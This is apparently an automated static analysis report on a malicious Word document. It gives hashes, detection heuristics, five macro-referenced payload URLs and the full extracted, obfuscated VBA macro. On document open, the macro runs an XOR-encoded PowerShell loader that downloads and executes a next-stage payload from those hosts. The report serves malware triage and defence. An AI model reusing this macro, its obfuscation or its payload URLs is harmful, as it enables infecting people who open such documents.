Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9b9df7735f83732…

MALICIOUS

Office (OLE)

Size: 115.5 KB
Created: 2018-06-14 13:37:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 642bea9ed625a094884a1f6ca6e2bb6e
SHA-1: ca819a1bd0d55a3dd995df22e306a2313dfa723b
SHA-256: c9b9df7735f837322f0f371c634ea9e0a61ed4609bfb5af7a64a25b7410f5514
Risk Score: 232

Heuristics 8

  • ClamAV: Doc.Malware.Valyria-6801300-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-6801300-0
  • VBA macros detected [medium, OLE_VBA_MACROS] (4 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical, OLE_VBA_SHELL]
    Matched line in script:
    rMzmtz = Sqr(90407)
    JRpQzSpb = iFdctFAVL + VBA.Shell(vKidQdCPXMO + Chr(ZzCDdn + vbKeyP + XSERPb) + "owers" + jdUPZoLU + crIjQC + GKXwSrDwuEv + RcjrU + LdBDAd, 19758 - 19758)
    dFYjkQ = lOKjPl - BobUi / 44119 / iYGYTR - 223327908 + Hex(zsdhlZ) * oiUzrC - Round(78513)
  • Payload URL decoded from an encoded PowerShell loader (5 URLs) [high, OLE_VBA_ENCODED_PS_DROPPER_URL]
    A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low, OLE_VBA_DOCOPEN]
    Matched line in script:
    End Function
    Private Sub Document_open()
    On Error Resume Next
  • Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://aspaud.com/7SUmuf/ (Referenced by macro)
    • http://mbfcs.com/tNs3Awl/ (Referenced by macro)
    • http://www.euro-specialists.com/dSIdR/ (Referenced by macro)
    • http://beurer.by/0QyKvqn/ (Referenced by macro)
    • http://rasslin.jp/aOx3B/ (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15463 bytes
SHA-256: 75d5d03a32f80afd9321b13853f0d487eb05d8cf19ff348d6e812141bee268bd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
252 of 395 identifiers look randomly generated (e.g. 'JiujdhPPwGcABV'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lpSJYHGtMLHQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function JRpQzSpb()
On Error Resume Next
ZnVtj = EGlLDj - FHRwL / 65446 / raUWAR - 223327908 + Hex(OpPDZl) * NtIjk - Round(19264)
iAzpwW = 4931 + RDAsnv + (47129 * CDbl(rBDvtI) - OqsPR / CSng(48780) - Uqmjd / Hex(TJVLUZ) + 72542 - 12973)
KwsRV = BjjaV
AiaBVo = Sqr(66464)
ljiptI = KPnOz - IPLPCi / 73210 / cIXlwc - 223327908 + Hex(lEiti) * aJlsuF - Round(32275)
fzSzs = 34547 + pQVIi + (96399 * CDbl(sNIRaY) - mqHod / CSng(58612) - rjMsTi / Hex(NbJoSA) + 54446 - 77339)
FjNhX = uWIDKG
EDYwB = Sqr(18386)
mlzCz = wXzAH - jPQzEX / 30529 / ziIzM - 223327908 + Hex(oDVrtB) * aJDZIj - Round(25156)
bKEuf = 14780 + KFUPD + (65483 * CDbl(aWIZV) - DdmGu / CSng(46200) - svoXK / Hex(SiaozZ) + 17501 - 49594)
ZfliDE = sJtWXA
ZQPAW = Sqr(67427)
mEWWN = QsraB - YqMvzB / 70869 / diFzvF - 223327908 + Hex(Vzuvw) * Tipzk - Round(84491)
EczqY = 31139 + BFGGPG + (11758 * CDbl(XwqCo) - qJhzhp / CSng(87790) - hQuTH / Hex(bcSHw) + 78435 - 2337)
DrwSPt = JSKdHK
rMzmtz = Sqr(90407)
JRpQzSpb = iFdctFAVL + VBA.Shell(vKidQdCPXMO + Chr(ZzCDdn + vbKeyP + XSERPb) + "owers" + jdUPZoLU + crIjQC + GKXwSrDwuEv + RcjrU + LdBDAd, 19758 - 19758)
dFYjkQ = lOKjPl - BobUi / 44119 / iYGYTR - 223327908 + Hex(zsdhlZ) * oiUzrC - Round(78513)
MzkDwW = 53437 + Auvwi + (9386 * CDbl(FLWwPJ) - iERjMs / CSng(85893) - VtHDk / Hex(iaraI) + 69632 - 15487)
MZQWn = MBzDn
iUriL = Sqr(13586)
JwYkG = aIXsR - bsoGoz / 72500 / XvuaKM - 223327908 + Hex(PjrUWS) * JwihDP - Round(34310)
RKQzFo = 41970 + BdLhNG + (13662 * CDbl(rUvBI) - DwZzRc / CSng(30340) - BTtGR / Hex(jswAH) + 66039 - 44977)
PZVWsc = PNckFw
LKOZIs = Sqr(73007)
End Function
Private Sub Document_open()
On Error Resume Next
lFJvW = pwPRwY - iAzmz / 77015 / loaSV - 223327908 + Hex(mqXhQt) * riZjAX - Round(92133)
NCwauh = 21366 + fYufq + (65793 * CDbl(YHuWhi) - jJkwS / CSng(87815) - HIPftv / Hex(kGIhGQ) + 95456 - 79527)
cOQZPT = HkLHm
uZlci = Sqr(55979)
NBCsE = utdNGD - zMDsNS / 63223 / KjzSr - 223327908 + Hex(wjQRDd) * VlwJGH - Round(99419)
cfwfrZ = 60226 + zbiAC + (88887 * CDbl(AaNlb) - kbWlwv / CSng(34271) - wuinwB / Hex(htsbr) + 89116 - 33374)
KSpUZ = rtcwd
joRfAr = Sqr(36502)
JRpQzSpb
fOEXq = vVXld - jQYiNM / 12598 / wNrfj - 223327908 + Hex(WYQmwT) * ZAPmP - Round(53921)
REZMn = 96163 + NvCZA + (58302 * CDbl(HiHKhW) - FJEpC / CSng(39145) - dfirn / Hex(UrktT) + 3262 - 73835)
zinOCk = NmmZmt
iloCFB = Sqr(11580)
CJsJw = WZNRv - lJuoml / 20073 / jRjUVf - 223327908 + Hex(ZGQtjl) * JAEtc - Round(3681)
pFRXZn = 25724 + WEloKh + (18678 * CDbl(Jwzkw) - jrJHr / CSng(54202) - MKwCY / Hex(UisMc) + 28204 - 35649)
wPVhY = ASMGpt
KksNK = Sqr(82553)
End Sub


Attribute VB_Name = "JiujdhPPwGcABV"
Function jdUPZoLU()
On Error Resume Next
pijWfA = Sqr(8710)
GYhTdL = JwtQA - SSSFv / 86146 / BdCiMZ - 223327908 + Hex(rlwPwH) * wnjArw - Round(88961)
jcvbUo = 24025 + rWifY + (31560 * CDbl(wIDjO) - DQWRV / CSng(90463) - McELNT / Hex(JUGZj) + 69559 - 23394)
LIMvv = AHJHv
ZWiwlPsz = "HeLL" + " & (" + " $EnV:Com" + "spEC[4,26" + ",25]-JO" + "IN'') ( " + Chr(34)
JzSaCi = Sqr(55389)
iNutZ = sFriD - SwfNJ / 97373 / ILQiW - 223327908 + Hex(bFKikC) * tVCblk - Round(92384)
cVCGDj = 66399 + zdUsn + (39127 * CDbl(lFEuhE) - PKBLF / CSng(58931) - hjofi / Hex(SdtnP) + 22568 - 46547)
bnTLOW = ORjHc
asvCnro = "$( SEt 'Of" + "s'  '')" + Chr(34) + "+" + " [STRI" + "Ng]( [chaR[]] " + "( " + "15," + "92,115 ,68, 126"
zLDRp = Sqr(18846)
NMSRd = BVwdtp - CjHrt / 76117 / hjcGKO - 223327908 + Hex(EpUFi) * OzFaYA - Round(50214)
WUANi = 46331 + wAhWG + (52756 * CDbl(IwuDc) - CAXXU / CSng(87283) - KSsqd / Hex(zaZUo) + 86992 - 25318)
lowlH = JMUFR
VkQYCd = ",90, 11 , 22,1" + "1," + " 69 ,78,92 , 6" + ",68 ,7" + "3, 65 , 78,72,9"
fwHPr = Sqr(43364)
joCpXw = BCKJv - rmDAl / 9229 / AGicF - 223327908 + Hex(TjHDS) * ONAnzF - Round(92655)
SdkLHO = 83229 + jcYPFv + (10146 * CDbl(hSsNic) - lLGLh / CSng(75203) - HjcCvT / Hex(ORmiB) + 45517 - 642)
EcquED = RDMYC
BLIDUadhM = "5, " + "11 , 89 , 7" + "4 ,69 , 79" + " , "
ivXjtq = Sqr(24189)
EAKCEp = qljhD - EVoPV / 59531 / KpIMmZ - 223327908 + Hex(hDKtV) * AEJJYZ - Round(68519)
EtZKak = 33135 + TtzsNj + (14771 * CDbl(zEuphD) - XFkcat / CSng(75549) - woJKT / Hex(dZUisu) + 44704 - 69486)
OQjYs = fasvHd
EhOtWimY = "68 " + ", 70,16 , 15, 6" + "5, 1" + "02 , 92, 95" + " , 106,11 ," + "22 , 11, 69" + ", "
jbiNa = Sqr(51111)
EbcQZ = iwbJj - TTjSB / 43796 / LvUiBv - 223327908 + Hex(UASrsV) * tPPss - Round(45340)
dPszPf = 69236 + nanLTC + (114 * CDbl(frvvM) - huWGv / CSng(59489) - TrVJz / Hex(oQLJu) + 99283 - 74504)
oHOqj = aZjTYL
qODlR = "78 , 92," + "6 ,68 ,73" + " ," + " 65,78 ," + "72, 95, 11 ,12" + "0 ,82 ,88" + " ,95,7"
izttdd = Sqr(68365)
rfJoz = kTszi - VOmLw / 47743 / Hlalhq - 223327908 + Hex(AsHMJZ) * uLvjmf - Round(21726)
OSktaU = 98543 + hfkQNA + (49301 * CDbl(TZIzP) - dkiqB / CSng(13016) - DJOCap / Hex(fVRXYd) + 46965 - 74219)
GSjzL = ThzJcq
qQmzDSpabK = "8 ,70 , 5 " + ",101 , 78" + " ," + " 95 ,5 ,124 ,7" + "8 ," + "73,104,71 " + ", 66,78 ,69 "
jdUPZoLU = ZWiwlPsz + asvCnro + VkQYCd + BLIDUadhM + EhOtWimY + qODlR + qQmzDSpabK
End Function
Function crIjQC()
On Error Resume Next
oUBSTD = Sqr(69877)
tBCVl = YFfJnO - LzPHoa / 44912 / lkpuRw - 223327908 + Hex(GMOVj) * AzJZQP - Round(29952)
iQtcwN = 20480 + MfpFwb + (4843 * CDbl(fLtmaj) - HnaIfh / CSng(47483) - FtwLv / Hex(EoRAp) + 83912 - 648)
EfitQd = KivEf
OJIMJRoQoLH = ",9" + "5 , 16 ," + " 15,113, " + "124, 101,66, 7" + "3 ,65" + " , " + "11 ,22 ,1" + "1, 12,6"
lEPRWj = Sqr(57192)
RFWqL = RHTkdQ - aNhST / 16615 / clLzOV - 223327908 + Hex(EzEMn) * cbOmC - Round(40887)
HQMaUp = 36487 + SvShqL + (1133 * CDbl(hYLHO) - FlIMV / CSng(66763) - BjsTJ / Hex(jwzwZw) + 28458 - 4972)
VfDlF = WmLicM
LSjKbhEKNSM = "7,9" + "5, 95, 91 ," + "17 ,4, 4, 74" + " ,88,91, 74, 9" + "4 " + ",79" + ",5 , 72,68"
ovtnLr = Sqr(75839)
Dlvrwv = zslAu - NaQlC / 58317 / pTsjIq - 223327908 + Hex(SjKdV) * XGijHz - Round(48941)
vifuX = 54462 + bNKPXp + (85917 * CDbl(wwuQwn) - njwOc / CSng(95670) - NPFKPc / Hex(wUPafu) + 38089 - 58750)
hoFMl = XKqhwC
njPuDncHi = " , 70 ," + " 4 , 28 , 1" + "20 , 126 ,70 " + ", 94 ,77 , 4,10" + "7,67, 95"
AoRuU = Sqr(48619)
YDIkcC = BJwBs - anXzH / 69249 / REQQH - 223327908 + Hex(ciYHP) * YNjQz - Round(66452)
sjsOi = 16175 + pQiIfS + (73721 * CDbl(vjiFE) - PjjNY / CSng(18692) - zGHUHT / Hex(WlRZoo) + 32424 - 18275)
amITj = bVcCJN
AJnwC = " ,95, 91 ,17 ," + " 4, 4,7" + "0," + " 73,77,72, " + "88" + " ,5 , " + "72 ,68 , 70 " + ", 4,9"
crIjQC = OJIMJRoQoLH + LSjKbhEKNSM + njPuDncHi + AJnwC
End Function
Function GKXwSrDwuEv()
On Error Resume Next
nOGAF = Sqr(5239)
qsBjUi = dMOvP - FVLGHK / 19730 / sRLbWi - 223327908 + Hex(aTddE) * iOozK - Round(51727)
kPbTms = 57258 + aacBj + (74258 * CDbl(wqWYQ) - QhBpa / CSng(56761) - GwVHpd / Hex(JmQiGE) + 59163 - 87869)
TcQPq = YzdNRR
JdFwNZzVE = "5, 101 , 88 " + ",24, 106 ,92 , " + "71 , " + "4 ,107 ,67"
GqDBW = Sqr(21851)
rvLvZX = mrtVO - aAkzRt / 37180 / QjLvD - 223327908 + Hex(TLJCK) * tbpWQY - Round(17749)
sNwbpE = 95639 + KDtlS + (22358 * CDbl(aGXJw) - znaZCM / CSng(8159) - wYSkiL / Hex(jnzsNX) + 4291 - 68330)
mRrJO = zRCAs
bjvXOQN = ", " + "95, 95" + " ,9" + "1, 17, 4" + " , 4 ,92 ,9" + "2,92 , 5, 78," + "94, 89,6" + "8, 6,88 ," + "91,78 , 7"
cqLTz = Sqr(88329)
UqsJwL = ptWRUV - Zdjzwi / 81190 / qwfZw - 223327908 + Hex(TvfETL) * bojpoi - Round(65568)
aLzAV = 40948 + airLcl + (98304 * CDbl(Njtki) - PQKGz / CSng(7109) - FFSht / Hex(AdXQCn) + 4943 - 72756)
MATBoE = FGDkds
oQXqF = "2 ," + "66 ,74 " + ", 71 ," + "66,88 , 95 "
JjGzFY = Sqr(54727)
qLuFq = jNHWO - fJtAFW / 93170 / rjZvWV - 223327908 + Hex(RCHfi) * BNwOfl - Round(42957)
BAwiW = 27780 + VwrNB + (18713 * CDbl(zozKKA) - vKazJ / CSng(12940) - GSLEIJ / Hex(bsESaa) + 24125 - 48095)
jWhQq = NcTAL
okvQrf = ", 88 , 5,72 ,68" + " ,70,4, " + "79 , " + "12" + "0, 9" + "8 ,79," + "121" + " ,4" + " ,10" + "7 ,67,95, 95 ,"
tRMQF = Sqr(59443)
qTTzB = fpQBF - olNnv / 50074 / unmXcV - 223327908 + Hex(NtzJh) * hMndt - Round(96613)
hSGmzi = 40178 + PKArj + (78272 * CDbl(vwmala) - mRVwd / CSng(23171) - izNvG / Hex(jHKPz) + 31082 - 33219)
ESDzt = AnFtj
aIoTKTacSz = "91,17 ,4 ," + "4, 73,78" + ", 94, 89 ,78, " + "89, 5, 73, 82" + ", 4 ,27 ,122 ,8" + "2 ,96,9" + "3, 90" + ",69 , 4, 1"
tKfBav = Sqr(69979)
VrtuL = FONIZV - diijO / 4645 / bIiYuF - 223327908 + Hex(aiiOR) * aUHDAX - Round(90280)
ZkQEwq = 54675 + zmqGUh + (53285 * CDbl(zkuzVi) - WsJkNf / CSng(78759) - Utqwz / Hex(jhCVMz) + 34749 - 53239)
zERtN = HdYjiQ
muLCppYW = "07, " + "67,95 , " + "95 ," + " 91,17, 4 , 4 " + ", 89,74,88, " + "88" + " ,7" + "1,66,69, 5,"
UnGAZp = Sqr(41900)
wWCRpM = XjwZsk - DBdsiZ / 68612 / ttvuTr - 223327908 + Hex(wHTjls) * Ejtop - Round(302)
rMJUAG = 44533 + jiuIlm + (18008 * CDbl(bfqHuU) - rfoiz / CSng(97554) - JCXrjH / Hex(iARXRb) + 30855 - 92754)
HwqsGa = bAVMt
szOVKpPpMbn = " 65 , 91, 4,74" + ",100 ," + " 83, 24 " + ", 105 ,4,12, 5 " + ",120 ,91, 71 " + ",66 , 95, 3 ,12"
BZtHZh = Sqr(40837)
SiNFf = zdqFQ - cQiHBn / 1683 / dOofUz - 223327908 + Hex(TNjCsm) * QsVqi - Round(96327)
dJWus = 69644 + hrGMzB + (82175 * CDbl(zzqjjr) - DrusH / CSng(76879) - aHjiWi / Hex(JwwFVD) + 71863 - 67812)
cqDAak = WhLwC
dwwOmuriPw = ",107 ,12 , " + "2 ,16 , 15 ,97," + " 10" + "2 , 100 , 92 " + ",72 ,121," + "11 , " + "22, 11 ,15" + ",92 ,115 ," + " 68," + " 126 ,90"
JkHzu = Sqr(56299)
diVwXA = wHnkmN - TokzF / 18911 / ioPzO - 223327908 + Hex(bXRcf) * hhEqDR - Round(9591)
EqhkfH = 62701 + KDYMG + (449 * CDbl(lLICzB) - rKkkIY / CSng(53643) - QLLmLC / Hex(FzqPMU) + 88317 - 92443)
cizUkP = ulGmhb
qsdSGEraLF = ",5, 69 ,78 , 8" + "3 ,95 ," + " 3 ,26 ," + " 7"
GKXwSrDwuEv = JdFwNZzVE + bjvXOQN + oQXqF + okvQrf + aIoTKTacSz + muLCppYW + szOVKpPpMbn + dwwOmuriPw + qsdSGEraLF
End Function
Function RcjrU()
On Error Resume Next
RNiHC = Sqr(6994)
wpVoNw = iZLcw - zwlOjR / 62959 / OfXkV - 223327908 + Hex(JBBid) * KfEECG - Round(30552)
SvtFB = 16085 + TbqLEz + (61845 * CDbl(OwhjA) - TaPfq / CSng(61082) - lcuaqT / Hex(mKkBI) + 32309 - 70414)
sHZjH = WpvXBo
OMtcIhJG = ",11, 29, 28 " + ", " + "31, 19,2" + "5,27" + ", 2,1" + "6, 15,12" + "6 , 7" + "9,122 ,100 , 9" + "2, 77,11," + " 22"
NjFfwc = Sqr(92250)
BjHzf = FlaLX - nUHzi / 44456 / YNMhJX - 223327908 + Hex(cLMmm) * cjGIH - Round(82429)
WWiJzD = 85671 + LdYczM + (44034 * CDbl(sjLZB) - YDprR / CSng(35135) - oYkHrO / Hex(wuHwNT) + 11061 - 3363)
fKqjS = SUcQb
UGAYziJ = ",11 ,15 ,78 " + ",69 ," + "93,17 ,95 , 78" + " , 70,91" + ", 11,0,1"
nzjVU = Sqr(82293)
ZQFVIz = PcXzuI - TzNjW / 35827 / shbBpP - 223327908 + Hex(apFFc) * MpipX - Round(11262)
fWroBw = 50677 + suZnZ + (23645 * CDbl(HOzqrF) - XAZZb / CSng(50807) - jmFoL / Hex(FoRGIQ) + 7604 - 65794)
aBMnI = wwsYHz
MRqrwJKzJR = "1 , 12, 119 " + ",12 , 11 ,0" + ", 11" + ",15" + ", 97,102 ,1" + "00,92 , 72 , " + "121, 11,0, 11 " + ", 12,5, 78 ,"
WqWEp = Sqr(68974)
jhDnSm = bDUjP - BmOfP / 45757 / CDvwh - 223327908 + Hex(boBtL) * qXiaz - Round(70097)
jiiUTk = 56219 + mRuSDv + (58493 * CDbl(YIQUu) - wKsPP / CSng(87395) - UPHDXf / Hex(EVEVV) + 25058 - 84936)
CilQJZ = TAVpwY
ZizBKZuk = "83," + " 78 , 12 , 16" + ",7" + "7 " + ", 68,89,7" + "8 ,74 " + ", 72 , 67,3" + ", " + "15,66," + " 95 , 77,"
sFYfzX = Sqr(24685)
nOwkas = WBBczH - tGSMYT / 32132 / tXpMCH - 223327908 + Hex(QJjNH) * YWrfvD - Round(15991)
RXudmF = 11243 + KjZKIf + (48144 * CDbl(SMOvBD) - JCuNjv / CSng(17908) - aCWmS / Hex(FnuiQJ) + 7764 - 37704)
UktAA = zaSkbq
kLcKtmnSHl = "96," + "101,66, 11,66 ," + "69, 11, 15,113" + ", 124, 101, 66" + " , 73"
jhiBr = Sqr(63758)
FVcWji = ZjtnSh - ORWWQ / 75546 / PYwLrU - 223327908 + Hex(nvuEL) * QMsHB - Round(41667)
BUYuNq = 68508 + krvmA + (6797 * CDbl(kahdQ) - VlvVd / CSng(93746) - sDWhUd / Hex(EzwRFT) + 93858 - 59318)
IbUiF = RNnws
kLXzG = " ,65, 2, 80 " + ",95 , " + "89, 82 ,80," + "15 , 65,102, "
mtNwX = Sqr(60795)
PqvKfb = JjOcv - PNEjFp / 21863 / mNTJnK - 223327908 + Hex(nzUKO) * ihoFzq - Round(4121)
JqwfKo = 26174 + lowjG + (33897 * CDbl(BZPVv) - FhMQh / CSng(88098) - zXjPi / Hex(GZPMw) + 23249 - 15499)
XiLfi = vRQLfa
Sibuwhz = "92 ,95 ," + "10" + "6 ," + " 5, 1"
BjQLs = Sqr(48814)
kjLvX = dIZzr - OQqni / 55188 / EZzZsW - 223327908 + Hex(NwICF) * YVsti - Round(58604)
ddcAr = 32387 + WkuSjD + (63422 * CDbl(QdGwJP) - QzsSR / CSng(88204) - VdctZE / Hex(LEHZR) + 87296 - 92341)
jzTQU = ZpiqhU
AqBGkh = "11,68," + "92 " + ", 69" + " ,71 , " + "68, 74 , 79,1"
vKhjT = Sqr(77891)
Nsmmi = wULAXl - roHWF / 94982 / QNoudv - 223327908 + Hex(iGRii) * NZSdjG - Round(10741)
QUalJS = 48029 + zfAWt + (81100 * CDbl(sYzEz) - lWdRwS / CSng(3309) - bnLPWk / Hex(vHjQF) + 35675 - 82498)
qhvhaZ = hlKwm
ifuqXkwQ = "09, 66, 71," + "78,3 ," + " 15, 66 ,95 " + ", 77 " + ",96, 101,66 ," + "5, 12" + "7 , 68" + ",120 ," + "95 ," + "89 ,66, "
ztjHsl = Sqr(49382)
firSK = jMGUnL - NcAtsI / 87166 / bQOGL - 223327908 + Hex(SNUQpc) * ZhFwPh - Round(8427)
wzEsJj = 57434 + OtRoz + (20469 * CDbl(Vimwr) - ipYMwc / CSng(17840) - CGEMzQ / Hex(NkaXb) + 69881 - 46681)
mYPihS = HDKiW
dGJXRhBQvFo = "69,76, 3, 2 " + ",7,11 ,15" + ", 126,79,122," + "10" + "0 ,92 ," + "77 , 2,16, " + "120,95, 74 ,8" + "9 ,95 , 6" + " , 123,89" + " ,68,72,78, 8"
RcjrU = OMtcIhJG + UGAYziJ + MRqrwJKzJR + ZizBKZuk + kLcKtmnSHl + kLXzG + Sibuwhz + AqBGkh + ifuqXkwQ + dGJXRhBQvFo
End Function
Function LdBDAd()
On Error Resume Next
zdmwV = Sqr(78284)
XCrOr = LSfPL - jnkmj / 36175 / RKMzwj - 223327908 + Hex(FSQhtj) * otKEGd - Round(28132)
DOcMz = 11293 + zmDzj + (9576 * CDbl(uuvcao) - LIRtTq / CSng(4342) - GQMwVV / Hex(clQbq) + 27880 - 56991)
QHzMr = QjOAdj
inmYo = "8, 88, " + "11 ,15 " + ", 126 , 79 , " + "122 ,100, 92,77" + ", 16 , 73 ,89, " + "78, 74 ," + "64, 16,86,72" + ",7" + "4, 95, 72"
ALFVnI = Sqr(50789)
iWQiQa = ZJpbUF - OMLUWB / 41616 / abpzSi - 223327908 + Hex(UPSDcD) * Pzqlmu - Round(10637)
IKDtf = 19099 + sCwVij + (84829 * CDbl(ahcpMz) - bnSqkp / CSng(6858) - iQlSji / Hex(LbTPY) + 31385 - 74152)
SkLfs = POqDdu
QAFAd = ", 67,80, 92" + " ,89 ,66,95 ,78" + ",6 ,67" + " ,68 ,88, 95 ,"
HSdww = Sqr(78870)
KrtEC = GzbIj - dlTXUV / 10311 / Hmbbh - 223327908 + Hex(UFsEp) * HiUSY - Round(89077)
ptSIJu = 80058 + JQdpT + (93082 * CDbl(ikObr) - mWMKil / CSng(18407) - fiJSza / Hex(XdcAP) + 19618 - 59161)
oSkHwt = TmZSl
pDjjKRqUi = "11 ,15, 116, 5" + " , 110" + " ," + " 83, 72 ,78, " + "91, 95 ,66, 68" + ", 6" + "9,5, 102, " + "78 , 88 ," + "88 , 74 ,76,78" + ", 16 ,86 "
YOLBAn = Sqr(92470)
dXrRlj = XmziG - FEwOTz / 83988 / SpZBI - 223327908 + Hex(doFDd) * OjtiS - Round(21631)
thtXPR = 45491 + CAEWTV + (41893 * CDbl(QAwazW) - bljrAH / CSng(6458) - zwNRZ / Hex(zDGWij) + 32148 - 51671)
jRfAr = hBQouI
wmYMudYVk = ", 86) |ForeaCH" + "-ObjECt {[chaR]" + "($_ -" + "BXOR'0x2b'" + " )})+" + Chr(34) + "$(Set-Var"
lcPrz = Sqr(110)
sYPtZ = aajYdd - QZRHb / 93685 / ztaYZo - 223327908 + Hex(WORNu) * YZwXD - Round(21140)
qEiLiR = 32356 + VwihwE + (9566 * CDbl(VKOvI) - KEbHrh / CSng(9460) - TZRWnz / Hex(YLQChB) + 70493 - 31042)
hzrhh = DTKPn
FuonFKzHWWo = "IaBLe  'OFS'" + "  ' ' ) " + Chr(34) + " " + ")"
LdBDAd = inmYo + QAFAd + pDjjKRqUi + wmYMudYVk + FuonFKzHWWo
End Function